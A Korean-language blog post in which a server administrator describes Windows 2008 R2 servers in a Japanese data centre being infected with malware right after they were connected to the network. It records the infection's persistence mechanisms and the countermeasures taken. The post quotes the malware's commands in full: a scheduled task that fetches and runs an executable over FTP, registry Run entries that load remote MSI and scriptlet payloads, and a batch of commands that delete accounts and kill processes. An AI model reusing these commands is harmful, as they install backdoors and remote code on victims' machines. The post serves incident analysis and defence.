끝이나지 않는 랜섬웨어 / Ransom:Win32/WannaCrypt.A!rsm

일본 IDC 에 있는 블레이드 서버 장비에 Windows 2008 R2 OS 를 3대 설치했다.

혹시나 예전처럼 랜섬웨어가 걸릴까 했는데, 역시나 였다. 

네트워크를 연결하는 순간 바로 걸려 버렸다. 

OS 버전에 따른 취약점이 있는 건지, 나중에 상위 버전의 OS 를 설치 후 테스트를 진행해야 겠다. 

암튼 일본쪽 네트워크는 회생 불능인것 같다. 가능하면 일본쪽은 사용 안하는것이 좋겠다.

 

이번에 확인 된 내용을 확인해 봤는데, 저번에 감염 된 내용하고는 조금 다른 부분이 있다. 

해커놈들이 침해 파일의 내용 및 배포 경로를 수정하고 있는 것 같다. 

윈도우 보안업데이트를 진행해도 원천적으로는 막을 수가 없는 것 같다. 일일이 찾아서 삭제하지 않는 이상은 처리가 안 된다. 

아래는 이번에 파악 된 내용의 결과이다. 

1.  작업 스케쥴러 등록

이름 : Mysa

트리거 : 서비스 시작시

동작 : cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe

2. 레지스트리 등록

키 이름 : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

데이터 : start1 msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q

3. 공격 파일 내용

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5

ok[1].txt

[down]

http://78.142.29.114:8888/close.bat C:\windows\debug\c.bat 0

[cmd]

net1 start schedule

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe

taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe

taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del

schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system"  /sc onstart /F

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dll" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q" /f

echo 123>>1.txt&start C:\windows\debug\c.bat&start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa

@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe

네트워크를 통해서 바로 감염이 되기 때문에, 최신 업데이트가 완료 된 백신을 로컬을 통해 먼저 설치 하고 네트워크 연결을 시도해야 하는 수 밖에 없는 것 같다. 

그런데 이 방식은 거의 불가능하므로, 사후 대책을 진행해야 한다. 

우선 윈도우 방화벽에서 인,아웃바운드 정책에 대해 재설정을 진행 했다. 

백신도 실시간 감지 동작을 제거로 변경 하였다. 

IDC 내에서 세팅을 진행하는 것이 아닌, 외부에서 세팅을 하고 서버를 반입 시키는게 가장 좋은 방법 인 것 같다. 

일본쪽은 글러먹었다.